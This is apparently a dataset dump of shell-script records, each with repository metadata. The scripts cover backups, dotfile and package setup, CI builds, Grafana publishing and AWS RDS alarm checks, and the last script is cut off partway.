      jq "{ \"dashboard\": ., \"folderId\": ${folder_id}, \"overwrite\": true }" > \
      "/tmp/${dbname}.json" ; then
    echo "Failed to build ${folder}/${dbname}"
    bad=$((bad+1))
    continue
  fi
  if ! curl -sf -X POST \
      -H "Authorization: Bearer ${TOKEN}" \
      -H 'Content-type: application/json' \
      -H 'Accept: application/json' \
      "${GRAFANA}/api/dashboards/db" \
      --data-binary "@/tmp/${dbname}.json" ; then
    echo "Failed to update ${folder}/${dbname}"
    bad=$((bad+1))
  fi
done
# Exit status is the number of failed dashboards (0 = all published).
exit ${bad}
| true
|
337b8e10fc4dc9a0c0ee078b099130a930c95a79
|
Shell
|
Mihail-Kostov/dotfiles-26
|
/bin/backup-dewback
|
UTF-8
| 762
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# Back up selected home directories: (legacy, commented-out) rsync to a remote
# host, and currently `aws s3 sync` to the dewback-backup bucket.

OPTIONS="-e ssh --relative --compress --archive --delete-excluded --progress --human-readable "
SERVER="backup.remote:cs-dewback"

cd /Users/csexton

# Rsync to Dreamhost
#rsync $OPTIONS Projects Pictures Documents $SERVER \
#  --exclude="OmniFocus Backups" \
#  --exclude="*vmwarevm" \
#  --exclude="Apple Marketing Material" \
#  --exclude="*DS_Store"

# S3
# Use an array so each --exclude/pattern pair is passed as separate, cleanly
# quoted arguments.  (The previous string version expanded unquoted and sent
# literal `"` characters to the AWS CLI, so the patterns never matched.)
S3_EXCLUDES=(--exclude ".DS_Store" --exclude "*.git/*" --exclude "*vmwarevm" --exclude "tmp" --exclude "*.tmp")

# Pulls in AWS credentials/configuration for the backup profile.
. ~/.aws/backup.conf

echo "${S3_EXCLUDES[@]}"

aws s3 sync ~/Pictures s3://dewback-backup/Pictures --delete "${S3_EXCLUDES[@]}"
aws s3 sync ~/Projects s3://dewback-backup/Projects --delete "${S3_EXCLUDES[@]}"
aws s3 sync ~/Documents s3://dewback-backup/Documents --delete "${S3_EXCLUDES[@]}"
| true
|
e0be1ef2fee4b8851be9a0bc818bb159be99caf7
|
Shell
|
linasn/tv-tuner
|
/pcap_txt_to_a828_replay.sh
|
UTF-8
| 253
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# Convert a pcap text dump (hex-dump style output) into a replay file:
# each packet becomes a "[timestamp]" line followed by its payload bytes.
[[ $# -ne 2 ]] && echo "Usage: $0 input_file output_file" && exit 1
# Pass 1: drop "Time" header and blank lines, rewrite timestamp lines as
# "[ts]", and keep only the hex rows for offsets 0040-0090 (payload).
sed -n '/Time/d;/^$/d;s/ *[0-9]* \([\.0-9]*\) *host.*/[\1]/p;s/\(00[4-9]0 [ 0-9a-f]* \).*/\1/p' $1 |
# Pass 2: squeeze whitespace, join the 0050/0060/0070 continuation rows onto
# the preceding row, then strip the leading "0040 " offset column.
awk '{$1=$1};1' | sed ':t;$!N;/\n00[567]0/s///;tt;s/^0040 //;P;D' > $2
| true
|
7bc9fdec5fc222044d8a0b38a0d8afe15fd3a644
|
Shell
|
rbasoalto/dotfiles
|
/bashrc
|
UTF-8
| 448
| 3.140625
| 3
|
[] |
no_license
|
path_remove () { export PATH=`echo -n $PATH | awk -v RS=: -v ORS=: '$0 != "'$1'"' | sed 's/:$//' | sed 's/$://'`; }
path_append () { path_remove $1; export PATH="$PATH:$1"; }
path_prepend () { path_remove $1; export PATH="$1:$PATH"; }
if [[ "$OSTYPE" == "darwin"* ]]; then
# Homebrew binaries first
path_prepend /usr/local/bin
fi
path_prepend ~/bin
if [[ "$OSTYPE" == "darwin"* ]]; then
export JAVA_HOME=$(/usr/libexec/java_home)
fi
| true
|
2974b5442fe2f063b53a67e405b3c85158b52e68
|
Shell
|
ucd-plse/func2vec-fse2018-artifact
|
/lib/eclat/eclat/ex/hdr2set
|
UTF-8
| 219
| 2.765625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Convert a whitespace-separated table (header row followed by data rows)
# into "set" form: each data row becomes "name1=val1 name2=val2 ...", using
# the header fields as names.
# Usage: hdr2set <input-file> <output-file>
gawk '
(NR == 1) {
for (i = 0; ++i <= NF; )
items[i] = $i;
}
(NR > 1) {
for (i = k = 0; ++i <= NF; ) {
if (k++ > 0) printf(" ");
printf("%s=%s", items[i], $i);
}
printf("\n");
}' $1 > $2
| true
|
94b6feea23dad33873d89aff801252eede55b33b
|
Shell
|
miecio45/dotfiles
|
/scripts/build_neovim
|
UTF-8
| 416
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Install neovim: build from source on apt-based systems, or via yaourt on
# Arch-like systems.  Needs privileges for the package manager.

# Detect the available package manager.  `command -v` is the portable
# replacement for `which`; like `which` it prints nothing when the command
# is missing, so the variables stay empty in that case.
APT_GET_CMD=$(command -v apt-get)
YAOURT_CMD=$(command -v yaourt)

if [[ -n "$APT_GET_CMD" ]]; then
  apt-get install libtool autoconf automake cmake g++ pkg-config unzip git
  git clone https://github.com/neovim/neovim
  cd neovim
  make
  sudo make install
elif [[ -n "$YAOURT_CMD" ]]; then
  yaourt -S neovim-git --noconfirm
else
  # NOTE(review): $PACKAGE is never set in this script, so the message prints
  # an empty name — TODO confirm whether it should say "neovim".
  echo "error can't install package $PACKAGE"
  exit 1
fi
| true
|
4d0f48a1ed76fc86b7742e08f2f481ae6d7cf859
|
Shell
|
massimiliano-brocchini/conf-and-utils
|
/bin/explode
|
UTF-8
| 178
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/zsh
# Split $2 on the single-character separator $1 and print one field per line
# (like PHP's explode).  Relies on zsh-specific 1-based string indexing
# ($string[i]); not portable to bash.
sep=$1
string=$2
value=""
for i in {1..${#string}}; do
x=$string[i]
if [[ "$x" == "$sep" ]]; then
# Separator hit: emit the accumulated field and start a new one.
echo $value
value=""
else
value+=$x
fi
done
# Emit the final field (the text after the last separator).
echo $value
| true
|
74df85c7251d1847676a6c672dd05620e8606e00
|
Shell
|
SilverSoldier/setup
|
/setup2.sh
|
UTF-8
| 1,424
| 2.828125
| 3
|
[] |
no_license
|
# To setup system based on my configurations
# Step 2: back up old files and replace with new files from customization folder
# Each step renames the existing dotfile to *_old ('|| :' keeps the script
# going when there is nothing to back up) and copies in the tracked version.
cd
echo "--> Back up old bashrc"
# Backup old bashrc
mv ~/.bashrc ~/.bashrc_old || :
cp ~/customization/dotfiles/.bashrc ~/
echo "--> Back up old vimrc"
# Backup old vimrc
mv ~/.vimrc ~/.vimrc_old || :
cp ~/customization/dotfiles/.vimrc ~/
echo "--> Installing plug"
curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
echo "--> Installing vim plugins"
vim +PlugInstall +qall
echo "--> Back up old aliases"
# Backup old bash_aliases
mv ~/.aliases ~/.aliases_old || :
cp ~/customization/dotfiles/.aliases ~/
echo "--> Back up old gitconifg"
# Backup old gitconfig (NOTE(review): "gitconifg" typo in the echoed message)
mv ~/.gitconfig ~/.gitconfig_old || :
cp ~/customization/dotfiles/.gitconfig ~/
cd
echo "--> Installing tmux in case not already installed"
# install tmux
sudo apt-get install tmux
echo "--> Back up old tmux_conf"
# Backup old tmux_conf
mv ~/.tmux_conf ~/.tmux_conf_old || true
cp ~/customization/dotfiles/.tmux.conf ~/
echo "--> Installing urxvt in case not already installed"
# install urxvt
sudo apt-get install rxvt-unicode
cd
echo "--> Back up old urxvt configuration"
# Backup old Xresources
mv ~/.Xresources ~/.Xresources_old || :
# NOTE(review): this uses mv (unlike the cp used elsewhere), which removes
# the file from the customization folder — confirm whether that is intended.
mv ~/customization/dotfiles/.Xresources ~/
# apt-get some necessary applications
sudo apt-get install zathura
|
0cab23021876e9c0840313ea56b5704792963b7f
|
Shell
|
karatatar/dotfiles
|
/scripts/package/aux/install.sh
|
UTF-8
| 1,411
| 3.828125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Return 0 if package $1 is installed.  Prefers the package's own
# "<pkg>::is_installed" hook (resolved via package::fn); falls back to
# checking that a command named after the package exists.
check_if_is_installed() {
  local -r package="$1"
  local -r fn="$(package::fn "$package" is_installed)"

  if platform::command_exists $fn; then
    $fn
  else
    platform::command_exists "$package"
  fi
}
# Install package $1 unless it is already present.  For each configured
# package manager (in order) it tries: (a) a per-manager package-name
# override taken from the package's "<pkg>::map" table, (b) a custom
# "<pkg>::<manager>" install function, (c) installing under the package's
# own name.  Returns 0 on success or if already installed, 1 otherwise.
install_if_not_installed() {
  local -r package="$1"
  # NOTE(review): dict::get is called with two arguments here but with
  # stdin + one argument below — presumably it supports both call styles;
  # verify against its definition.
  local -r pkg_managers="$(dict::get "$OPTIONS" pkg_managers)"
  local map_fn="" install_fn="" map="" actual_package=""

  if check_if_is_installed "$package"; then
    echoerr "$package is already installed"
    return 0
  fi

  map_fn="${package}::map"
  if platform::command_exists $map_fn; then
    map="$($map_fn || echo "")"
  fi

  for pkg_manager in $pkg_managers; do
    install_fn="${package}::${pkg_manager}"
    actual_package="$(echo "$map" | dict::get "$pkg_manager" || echo "")"

    if [[ -n "$actual_package" ]] && "${pkg_manager}::install" "$actual_package"; then
      return 0
    elif platform::command_exists "$install_fn" && $install_fn; then
      return 0
    elif "${pkg_manager}::install" "$package"; then
      return 0
    fi
  done

  return 1
}
# Entry point for the "install" command: install every requested package,
# loading each package's custom recipe first.
# Returns the number of packages that failed to install (0 = all ok).
handler::install() {
  local -r packages="$(dict::get "$OPTIONS" values)"
  local failures=0

  for package in $packages; do
    package::load_custom_recipe "$package"

    if ! install_if_not_installed "$package"; then
      failures=$((failures+1))
    fi
  done

  return $failures
}
| true
|
56ee321c9347bec235dfbdc1cd30719ef24d12f5
|
Shell
|
apoorvam/moc-apps
|
/ci/diff-with-previous.sh
|
UTF-8
| 963
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# Show the diff of rendered kustomize output for <overlay> between a base git
# ref (default HEAD^) and HEAD.
# Usage: diff-with-previous.sh [-f] [-r ref] <overlay>
#   -r ref   compare against this ref instead of HEAD^
#   -f       run even if the working tree has uncommitted changes

OPT_BASE_REF='HEAD^'

while getopts fr: ch; do
    case "$ch" in
        (r) OPT_BASE_REF=$OPTARG
            ;;
        (f) OPT_FORCE=1
            ;;
        # Was: echo "ERROR: unknown optoin: $1" — typo, and "$1" names the
        # first argument rather than the offending option.
        (\?) echo "ERROR: unknown option: -$OPTARG" >&2
            exit 2
            ;;
    esac
done
shift $(( OPTIND - 1 ))

if [[ -z "$1" ]]; then
    echo "ERROR: missing required argument <overlay>" >&2
    exit 2
fi
overlay=$1
shift

# Refuse a dirty tree unless -f: we diff committed content only (git archive).
if [[ -z $OPT_FORCE ]] && ! git diff-index --quiet HEAD; then
    echo "ERROR: please commit your changes first." >&2
    exit 1
fi

# Extract both revisions into a throw-away work dir and diff the rendered
# kustomize output; a missing overlay on either side diffs as empty input.
workdir=$(mktemp -d tmp.kustomizeXXXXXX)
trap 'rm -rf "$workdir"' EXIT

mkdir -p "$workdir/prev" "$workdir/head"
git archive "${OPT_BASE_REF}" | tar -C "$workdir/prev" -xf -
git archive HEAD | tar -C "$workdir/head" -xf -

diff -u \
    <([[ -d ${workdir}/prev/${overlay} ]] && kustomize build "$workdir/prev/${overlay}") \
    <([[ -d ${workdir}/head/${overlay} ]] && kustomize build "$workdir/head/${overlay}")
exit 0
| true
|
77521370f177fef4b269733e678cb8d25a433e2a
|
Shell
|
bishnubibhabdas/gitjenkinintegration
|
/myscript.sh
|
UTF-8
| 152
| 2.921875
| 3
|
[] |
no_license
|
# Greet the user, prompt for a name on stdin, and echo it back.
printf '%s\n' "Welcome to the world of shell scripting"
printf '%s\n' 'Default script is bash'
printf '%s\n' 'Thank you'
printf '%s\n' "Enter your name"
read name
echo "my name is" $name "Das"
| true
|
ce310de155dd3ac3dc4d78a0b70a5e6dfcbc034d
|
Shell
|
Wellsjian/20180826
|
/xiaojian/forth_phase/shell/day02/08_func_directory.sh
|
UTF-8
| 260
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Prompt for a directory name and create it under the course day02 directory
# unless it already exists.
create_dir(){
  read -p "请输入目录名:" dirname
  directory="/home/tarena/materials/xiaojian/forth_phase/shell/day02/$dirname"
  # Fixed: the original wrote "[ !-e $directory ]" (no space after '!'),
  # which is not a valid test expression, so the condition always failed and
  # the "already exists" message was printed instead of creating the dir.
  if [ ! -e "$directory" ];then
    mkdir "$directory"
  else
    echo "文件夹已经存在"
  fi
}
create_dir
| true
|
5a7115efdcfbc6dbe8df03cf7e75e23e0abf12ac
|
Shell
|
Mgvanhoy52/AccessoryServer
|
/install/install_io.sh
|
UTF-8
| 2,701
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Interactive installer for GPIO I/O components: wiringPi, the gpio-reflect
# kernel module (infrared RX/TX), and rc-switch (433MHz RX/TX).  Prompts for
# the pins to use; must be run as root (writes under /lib/modules and /etc).
echo "installing wiring-pi"
git clone git://git.drogon.net/wiringPi
cd wiringPi
./build
cd ..
rm -rf wiringPi
# Default pins: IR pins use BCM numbering, RF pins use wiringPi numbering.
IRIN=15
IROUT=18
RFIN=2
RFOUT=0
echo "Do you want to install the components for transmitting and receiving infrared signals?"
echo "Enter 'skip' if you want to skip this step, otherwise press any key."
read answer
if [[ $answer != "skip" ]]
then
# NOTE(review): plain bash echo does not interpret "\n"; these messages print
# a literal backslash-n unless run under a shell where echo expands escapes.
echo "\nIn the following steps you can change the pins for receiving and transmitting signals."
echo "The recommended pins are the default pins (only change them if you know what you are doing).\n"
echo "The infrared Pins are mapped after the 'BCM' scheme."
echo "Here is the mapping table: (Please ignore the 'Mode' and the 'V' column)"
gpio readall
echo "\nEnter the input pin for the infrared receiver (Press enter for default: $IRIN):"
read input
if [ $input ]
then
IRIN=$input
fi
echo "Input pin is $IRIN!"
echo "Enter the output pin for the infrared transmitter (Press enter for default: $IROUT):"
read input
if [ $input ]
then
IROUT=$input
fi
echo "Output pin is $IROUT!"
echo "installing gpio-reflect"
git clone https://github.com/Appyx/gpio-reflect.git
cd gpio-reflect
chmod +x build.sh
./build.sh
# Install the module, load it at boot, and record the chosen pins.
cp gpio-reflect.ko /lib/modules/$(uname -r)/kernel/drivers/
echo gpio-reflect >> /etc/modules
echo "options gpio-reflect in=$IRIN out=$IROUT" > /etc/modprobe.d/gpio-reflect.conf
depmod
cd ..
rm -rf gpio-reflect
fi
# NOTE(review): this prompt says "infrared" but the section installs the
# 433MHz components — message text left as-is.
echo "Do you want to install the components for transmitting and receiving infrared signals?"
echo "Enter 'skip' if you want to skip this step, otherwise press any key."
read answer
if [[ $answer != "skip" ]]
then
echo "\nIn the following steps you can change the pins for receiving and transmitting signals."
echo "The recommended pins are the default pins (only change them if you know what you are doing).\n"
echo "The 433MHz Pins are mapped after the 'wPi' scheme.\n"
echo "Here is the mapping table: (Please ignore the 'Mode' and the 'V' column)"
gpio readall
echo "Enter the input pin for the 433MHz receiver (Press enter for default: $RFIN):"
read input
if [ $input ]
then
RFIN=$input
fi
echo "Input pin is $RFIN!"
echo "Enter the output pin for the 433MHz transmitter (Press enter for default: $RFOUT):"
read input
if [ $input ]
then
RFOUT=$input
fi
echo "Output pin is $RFOUT!"
echo "installing rc-switch"
git clone https://github.com/sui77/rc-switch.git
# NOTE(review): codesend.cpp/sniffer.cpp live inside rc-switch/, but there is
# no `cd rc-switch` here — these sed/make steps look like they run in the
# wrong directory; TODO confirm against the repository layout.
sed -i "1i#define PIN $RFOUT" codesend.cpp
sed -i "1i#define PIN $RFIN" sniffer.cpp
make
# Strip the injected "#define PIN" line again after building.
echo "$(tail -n +2 codesend.cpp)" > codesend.cpp
echo "$(tail -n +2 sniffer.cpp)" > sniffer.cpp
mkdir ../bin
mv codesend ../bin/codesend
mv sniffer ../bin/sniffer
rm -rf codesend.o
rm -rf sniffer.o
rm -rf rc-switch
fi
| true
|
35d58cc4e28173f6af6a0ee1dc1270eee63f87f8
|
Shell
|
helau/gen2vdr
|
/etc/gen2vdr/_config/bin/powerb.sh
|
UTF-8
| 716
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Skript which is executed when the powerbutton is pressed
# Behaviour: normally asks VDR to power down (or reboots when VDR is not
# running); PB_FUNCTION=EJECT ejects instead, and PB_FUNCTION=HALT_EJECT (or
# empty) treats a second press within 2 seconds as an eject.
source /_config/bin/g2v_funcs.sh
EJECT_CMD="/_config/bin/eject.sh"
if [ "$(pidof vdr)" != "" ] ; then
HALT_CMD="/usr/bin/svdrpsend.sh HITK power"
else
HALT_CMD="shutdown -r now"
fi
#set -x
CMD="$HALT_CMD"
if [ "${PB_FUNCTION}" = "EJECT" ] ; then
CMD="$EJECT_CMD"
elif [ "${PB_FUNCTION/HALT_EJECT/}" = "" ] ; then
# Double-press detection: compare the timestamp file's mtime with "now".
PBTMP="/tmp/~pb"
if [ -f $PBTMP ] ; then
ACTDATE=$(date +%s)
# NOTE(review): parses 'ls -l' output for the mtime; 'stat -c %Y' would be
# simpler — left as-is.
FDATE=$(ls -l --time-style=+%s $PBTMP | tr -s ' ' |cut -f6 -d ' ')
DIFF=$(($ACTDATE - $FDATE))
if [ $DIFF -le 2 ] ; then
CMD=$EJECT_CMD
fi
fi
touch $PBTMP
fi
glogger -s "Starte <$CMD>"
# Run detached so the power-button handler returns immediately.
screen -dm sh -c "$CMD"
| true
|
b7f33fa99b63843d1d878f439b810540595dbf87
|
Shell
|
mjlsuccess/mrpt
|
/travis/travis_main.sh
|
UTF-8
| 2,721
| 3.90625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Travis CI driver for MRPT: install dependencies, then run the task named in
# $TASK ("build" or "test").  Behaviour is tuned by $DEPS, $CC, $BUILD_TYPE
# and $TRAVIS_OS_NAME.
set -e # Make sure any error makes the script to return an error code
MRPT_DIR=`pwd`
BUILD_DIR=build
CMAKE_C_FLAGS="-Wall -Wextra -Wabi -O2"
CMAKE_CXX_FLAGS="-Wall -Wextra -Wabi -O2"
EXTRA_CMAKE_ARGS="-DDISABLE_PCL=ON" # PCL causes link errors (?!)
# Install build tools and (unless DEPS=minimal) the MRPT third-party
# dependencies via apt.  DEPS=headless additionally skips the GUI packages;
# the "lint" task also installs the Python lint requirements.
function prepare_install()
{
  apt-get install build-essential software-properties-common gcc g++ clang pkg-config cmake python-pip -y
  apt-get install git-core -y
  apt-get install ccache -y
  if [ "$TASK" == "lint" ]; then
    pip install -r travis/python_reqs.txt
  fi
  if [ "$DEPS" != "minimal" ]; then
    apt-get install libftdi-dev zlib1g-dev libusb-1.0-0-dev libdc1394-22-dev -y
    apt-get install libjpeg-dev libopencv-dev libgtest-dev libeigen3-dev -y
    apt-get install libsuitesparse-dev libopenni2-dev libudev-dev -y
    apt-get install libboost-python-dev libpython-dev python-numpy -y
    # We must use a custom PPA to solve errors in PCL official pkgs
    add-apt-repository ppa:jolting/backport-mrpt
    apt-get update -qq
    apt-get install libpcl-dev -y
    if [ "$DEPS" != "headless" ]; then
      apt-get install libwxgtk3.0-dev -y
      apt-get install freeglut3-dev -y
      apt-get install libavformat-dev libswscale-dev -y
      apt-get install libassimp-dev -y
      apt-get install qtbase5-dev libqt5opengl5-dev -y
    fi
  fi
}
# Recreate an empty $BUILD_DIR under $MRPT_DIR and cd into it, discarding any
# untracked files left over from a previous run.  Path variables are quoted
# so paths containing spaces cannot mis-expand under `set -e`.
function prepare_build_dir()
{
  # Make sure we dont have spurious files:
  cd "$MRPT_DIR"
  git clean -fd || true
  rm -fr "$BUILD_DIR" || true
  mkdir -p "$BUILD_DIR"
  cd "$BUILD_DIR"
}
# Configure and compile MRPT in a fresh build dir.  Examples are skipped with
# gcc (Travis time limit) and Python bindings are disabled for
# minimal-dependency builds.
function build ()
{
  prepare_build_dir
  # gcc is too slow and we have a time limit in Travis CI: exclude examples when building with gcc
  if [ "$CC" == "gcc" ]; then
    BUILD_EXAMPLES=FALSE
  else
    BUILD_EXAMPLES=TRUE
  fi
  if [ "$DEPS" == "minimal" ]; then
    DISABLE_PYTHON_BINDINGS=ON
  else
    DISABLE_PYTHON_BINDINGS=OFF
  fi
  VERBOSE=1 cmake $MRPT_DIR \
    -DBUILD_EXAMPLES=$BUILD_EXAMPLES \
    -DBUILD_APPLICATIONS=TRUE \
    -DBUILD_TESTING=FALSE \
    -DDISABLE_PYTHON_BINDINGS=$DISABLE_PYTHON_BINDINGS \
    $EXTRA_CMAKE_ARGS
  make -j3
  cd $MRPT_DIR
}
# True iff the given name resolves to a runnable command (binary, builtin,
# function or alias).
command_exists () {
  type "$1" >/dev/null 2>&1
}
# Configure (apps disabled) and run the unit-test suite.  Skipped entirely
# for gcc on macOS because of the Travis time limit.  Note: this shadows the
# `test` shell builtin, which is harmless here since the script uses `[ ]`.
function test ()
{
  # gcc is too slow and we have a time limit in Travis CI:
  if [ "$CC" == "gcc" ] && [ "$TRAVIS_OS_NAME" == "osx" ]; then
    return
  fi
  prepare_build_dir
  cmake $MRPT_DIR \
    -DBUILD_APPLICATIONS=FALSE \
    -DCMAKE_BUILD_TYPE=${BUILD_TYPE} \
    $EXTRA_CMAKE_ARGS
  # Remove gdb use for coverage test reports.
  # Use `test_gdb` to show stack traces of failing unit tests.
  # if command_exists gdb ; then
  #   make test_gdb
  # else
  make test
  # fi
  cd $MRPT_DIR
}
# Always install dependencies, then dispatch on the requested CI task.
prepare_install
case $TASK in
  build ) build;;
  test ) test;;
esac
| true
|
790777c36fd47dcdc8d99f9248c19c99de2fb911
|
Shell
|
hugmatj/viconf
|
/viconf-check.sh
|
UTF-8
| 581
| 3.6875
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer",
"0BSD"
] |
permissive
|
#!/bin/sh
# Post-edit hook for viconf: nudge the user to contribute database entries,
# show a diff of the pending change, and ask whether to keep it.
# NOTE(review): $config_file, $config_file_is_empty and $template_config_file
# are never set here — presumably this script is invoked by a wrapper that
# exports them; verify against the caller.  $1 is the edited temp file.
repo_url=https://github.com/weakish/viconf
if grep -q viconf $config_file ; then
echo
echo "Adding entries to viconf's database?"
echo "Consider sending a pull request. Thanks."
echo "You can find viconf at" $repo_url
echo
fi
# Show what would change: against the template when the config file is new,
# otherwise against the existing config file.
if [ $config_file_is_empty ]; then
if [ -n "$template_config_file" ]; then
diff -u $template_config_file $1
else
cat $1 | sed -r -e 's/^/+ /'
fi
else
diff -u $config_file $1
fi
# The exit status tells the caller whether to keep (0) or discard (1) it.
read -p 'Review your changes. Do you want to save it?[Y/n]:' save_it
case $save_it in
n|N) exit 1 ;;
*) exit 0 ;;
esac
| true
|
1a03bf2e5f34b25adfa90b2c818ee0e81b78a2b0
|
Shell
|
JuserZhang/iso-builder
|
/pyisobuilder-nonon-free/scripts/I01-generate-sqfs-file.sh
|
UTF-8
| 435
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Squash a chroot into a live-boot filesystem image and record its
# uncompressed size and package manifest alongside it.
# Usage: I01-generate-sqfs-file.sh <chroot> <iso-build-dir> <live-subdir> [name]
CHROOT_PATH=$1
ISO_BUILD_PATH=$2
LIVE_PATH=$3
# Image base name; defaults to "filesystem".
SQFSNAME=${4:-filesystem}
# presumably defines chroot_do (run a command inside the chroot) — verify.
source common
sudo mksquashfs ${CHROOT_PATH} ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.squashfs -comp xz
# Uncompressed size in bytes, written next to the image.
sudo du -sx --block-size=1 ${CHROOT_PATH} | cut -f1 > ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.size
chroot_do ${CHROOT_PATH} dpkg-query -W --showformat='${Package} ${Version}\n' \
> ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.manifest
| true
|
c6757b0dea004e0f9ea38be6c0f0832824a80df2
|
Shell
|
moul/kythe
|
/tools/git/test-affected-targets.sh
|
UTF-8
| 1,551
| 3.46875
| 3
|
[
"Apache-2.0",
"NCSA"
] |
permissive
|
#!/bin/bash
# Copyright 2021 The Kythe Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A pre-commit hook which will determine and run affected test targets using the
# files passed on the command line.
# Usage: test-affected-targets.sh file...
set -e
OMIT_TAGS=(manual broken arc-ignore docker)
# Join all arguments after the first using the first argument as the
# separator, e.g. `join_by '|' a b c` prints "a|b|c" (no trailing newline).
function join_by {
  local sep="$1"; shift
  local head="$1"; shift
  # Print the first element, then each remaining element prefixed with sep.
  printf '%s' "$head" "${@/#/$sep}"
}
# Regex fragment matching any tag that must be excluded from CI.
TAG_RE="\\b($(join_by '|' "${OMIT_TAGS[@]}"))\\b"
# All non-excluded targets that transitively depend on the changed files
# passed on the command line.
readarray -t TARGETS < <(bazel query \
  --keep_going \
  --noshow_progress \
  "let exclude = attr('tags', '$TAG_RE', //...) in rdeps(//... except \$exclude, set($*)) except \$exclude")
if [[ "${#TARGETS[@]}" -gt 0 ]]; then
  echo "Building targets"
  bazel build --config=prepush "${TARGETS[@]}"
fi
# Of those targets, the runnable tests (again minus excluded tags).
readarray -t TESTS < <(bazel query \
  --keep_going \
  --noshow_progress \
  "let expr = tests(set(${TARGETS[*]})) in \$expr except attr('tags', '$TAG_RE', \$expr)")
if [[ "${#TESTS[@]}" -gt 0 ]]; then
  echo "Running tests"
  bazel test --config=prepush "${TESTS[@]}"
fi
| true
|
d74788f8de3c062a4da1712ff7e9963ad8f5545d
|
Shell
|
konstl000/pcf-spring-music-code
|
/scripts/build.sh
|
UTF-8
| 170
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Build the spring-music WAR and copy it to the output directory given as $1.
set -e -x
if [ "$#" -ne 1 ]; then
  echo "Please provide location to place build output."
  exit 1;
fi
./gradlew build
# Quote the destination so paths containing spaces work.
cp build/libs/spring-music.war "$1"
| true
|
531b1ea3b2c35c308d669ed5d4e1c9f3775c03ae
|
Shell
|
xamindar/rotate-backups
|
/backup-minecraft.sh
|
UTF-8
| 1,061
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Snapshot the Minecraft world with btrfs while the server keeps running:
# flush and pause world saving, take a read-only snapshot, then re-enable
# saving.  Commands are injected into the server's screen session.
# wipe any stale screens
#sudo -u minecraft screen -wipe
# First, check if the server is even running. If not, then do nothing and exit.
if screen -ls minecraft/ | grep 'Private\|Attached\|Detached'; then
  echo server active, backing up
  # save the world
  sudo -u minecraft screen -X stuff "say Preparing for server snapshot, world saving disabled. $(printf '\r')"
  sudo -u minecraft screen -X stuff "save-all $(printf '\r')"
  # turn off server saving so the snapshot is consistent
  sudo -u minecraft screen -X stuff "save-off $(printf '\r')"
  if ! mountpoint -q /mnt/btrfs ;then
    echo "btrfs root not mounted, mounting"
    mount /mnt/btrfs
  fi
  # create new read-only snapshot of minecraft directory
  sleep 5 # just in case
  btrfs subvolume snapshot -r /srv/minecraft /mnt/btrfs/backups/minecraft_backup_`date +%F-%H%M%S`
  #umount /mnt/btrfs
  # turn server saving back on
  sudo -u minecraft screen -X stuff "save-on $(printf '\r')"
  sudo -u minecraft screen -X stuff "say Server snapshot complete, world saving enabled. $(printf '\r')"
else
  echo no active server, exiting
  exit
fi
| true
|
582542e9e3e2446a662812dece939f3b629654cb
|
Shell
|
tsutsu/workspace
|
/setup-30-create-user.sh
|
UTF-8
| 189
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Create the 'tsutsu' account with 'staff' as primary group, install the
# prepared skeleton as its home directory, and fix ownership.
set -e
export TERM=xterm
# -M: do not create a home dir (one is moved in below); -N: no per-user
# group; -g takes the numeric gid of 'staff' parsed out of /etc/group.
useradd -M -N -g "$(grep -e "^staff:" /etc/group | cut -d':' -f 3)" -s /bin/bash tsutsu
mv /tmp/skel /home/tsutsu
chown -R tsutsu:staff /home/tsutsu
| true
|
4dad96b755f55adc35e83fd9df3a1be04cdb2d14
|
Shell
|
camview16/spawn_RDS_writer
|
/check_RDS_metric_status
|
UTF-8
| 1,158
| 3.953125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# If the spawn flag is set, check the RDS high-CPU CloudWatch alarm; when it
# is in ALARM state, clear the flag and launch the spawn_RDS scaling script.
# Fetch flag value to check the Cloudwatch ALARM trigger, 1=Run, 0=stop
# NOTE(review): this awk keeps only the value from the *last* KEY=VALUE line
# of the config file — fine while the file has a single entry.
SPAWN_RDS_FLAG=$(cat $PWD/spawn_RDS_config | awk '{split($0,array,"=")} END{print array[2]}')
if [ $SPAWN_RDS_FLAG -eq 1 ]
then
  # Alarm names (redacted placeholders) for each environment.
  live_rds_high_cpu_metric=XXXX
  test_rds_high_cpu_metric=XXXX
  # LIVE = 1
  # TEST = 2
  env=2
  profile_name=AAAA
  if [ $env -eq 2 ]
  then
    echo "TEST config set"
    db_instance_metric_name=$test_rds_high_cpu_metric
  elif [ $env -eq 1 ]
  then
    echo "LIVE config set"
    db_instance_metric_name=$live_rds_high_cpu_metric
  fi
  # Check if CPU high metric is in ALARM or OK state to spawn the instance vertically
  metric_status=$(/usr/local/bin/aws cloudwatch describe-alarms --alarm-names $db_instance_metric_name --profile $profile_name --query 'MetricAlarms[0].StateValue' --output text)
  if [ "$metric_status" = "ALARM" ]
  then
    echo "NOT OK"
    # Flip the flag to 0 before spawning — presumably to prevent the next
    # run from triggering another spawn; confirm with spawn_RDS.
